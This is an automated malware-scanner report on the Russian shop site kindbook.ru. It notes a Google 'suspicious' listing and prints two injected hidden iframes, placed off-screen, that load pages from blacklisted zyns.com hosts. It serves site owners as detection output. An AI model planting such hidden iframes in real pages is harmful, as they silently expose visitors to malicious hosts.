New scan:

Malware Scanner report for kindbook.ru

Malicious/Suspicious/Total urls checked
1/2/15
3 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "kindbook.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
2/0/2
2 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kindbook.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://kindbook.ru/
200 OK
Content-Length: 74740
Content-Type: text/html
malicious
Page code contains blacklisted domain: staatis.zyns.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<link rel="shortcut icon" type="image/x-icon" href="/bitrix/templates/eshop_red/favicon.ico" />
<script src="/bitrix/templates/eshop_red/js/jquery-1
...[4060 bytes skipped]...

Malicious iFrame found.
size: 468x60     
src: http://starsic.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://starsic.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

Malicious iFrame found.
size: 468x60     
src: http://staatis.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://staatis.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

http://kindbook.ru/bitrix/templates/eshop_red/js/jquery-1.8.2.min.js
200 OK
Content-Length: 93435
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/cache/js/s1/eshop_red/kernel/kernel.js?1403268701
200 OK
Content-Length: 302285
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/cache/js/s1/eshop_red/template_1ff4a9abe21506b8d8b84ca5db1e2877/template_1ff4a9abe21506b8d8b84ca5db1e2877_327fbafd25321d5fd5aed7f017dbda67.js?1382729471
200 OK
Content-Length: 8764
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/slides.min.jquery.js
200 OK
Content-Length: 7702
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/script.js
200 OK
Content-Length: 28239
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/jquery.carouFredSel-5.6.4-packed.js
200 OK
Content-Length: 32324
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/jquery.cookie.js
200 OK
Content-Length: 4371
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/jquery.slideViewerPro.1.5.js
200 OK
Content-Length: 10543
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/jquery.timers.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://kindbook.ru/bitrix/templates/eshop_red/js/fancybox/jquery.fancybox-1.3.1.pack.js
200 OK
Content-Length: 14750
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19489
Content-Type: text/javascript
clean
http://kindbook.ru/personal/cart/
200 OK
Content-Length: 40861
Content-Type: text/html
clean
http://kindbook.ru/login/?register=yes&backurl=%2Fpersonal%2Fcart%2F
200 OK
Content-Length: 42906
Content-Type: text/html
suspicious
Suspicious code found

<form method="post" action="/login/?register=yes&amp;backurl=%2Fpersonal%2Fcart%2F" name="bform">
<input type="hidden" name="backurl" value="/login/?backurl=%2Fpersonal%2Fcart%2F" />
<input type="hidden" name="AUTH_FORM" value="Y" />
<input type="hidden" name="TYPE" value="REGISTRATION" />
Èìÿ<br>
<input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/>
Ôàìèëèÿ<br>
&
... 1102 bytes are skipped ...
br>
<input type="text" name="captcha_word" maxlength="50" value="" />
<p style="clear: left;"><input type="hidden" name="captcha_sid" value="0fe155ec6701a27cf409dd080b0807f4" />
<img src="/bitrix/tools/captcha.php?captcha_sid=0fe155ec6701a27cf409dd080b0807f4" width="180" height="40" alt="CAPTCHA" /></p>
<input type="submit" class="bt3" style="width:100%;" name="Register" value="Çàðåãèñòðèðîâàòüñÿ" />
</form>

http://kindbook.ru/login/?register=yes&backurl=%2Flogin%2F
200 OK
Content-Length: 42866
Content-Type: text/html
suspicious
Suspicious code found

<form method="post" action="/login/?register=yes&amp;backurl=%2Flogin%2F" name="bform">
<input type="hidden" name="backurl" value="/login/?backurl=%2Flogin%2F" />
<input type="hidden" name="AUTH_FORM" value="Y" />
<input type="hidden" name="TYPE" value="REGISTRATION" />
Èìÿ<br>
<input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/>
Ôàìèëèÿ<br>
<input type="text"
... 1082 bytes are skipped ...
br>
<input type="text" name="captcha_word" maxlength="50" value="" />
<p style="clear: left;"><input type="hidden" name="captcha_sid" value="067e89b7763a5720e8089d6ff98c792e" />
<img src="/bitrix/tools/captcha.php?captcha_sid=067e89b7763a5720e8089d6ff98c792e" width="180" height="40" alt="CAPTCHA" /></p>
<input type="submit" class="bt3" style="width:100%;" name="Register" value="Çàðåãèñòðèðîâàòüñÿ" />
</form>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kindbook.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:26:03 GMT
ETag: cb85a408040a8317073180dcea5f7655
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Length: 74740
Content-Type: text/html; charset=windows-1251
Expires: Fri, 7 Jun 1974 04:00:00 GMT
Last-Modified: Tue, 20 Jan 2015 13:06:44 GMT
X-Powered-By: PHP/5.3.29

...74740 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kindbook.ru
Referer: http://www.google.com/search?q=kindbook.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.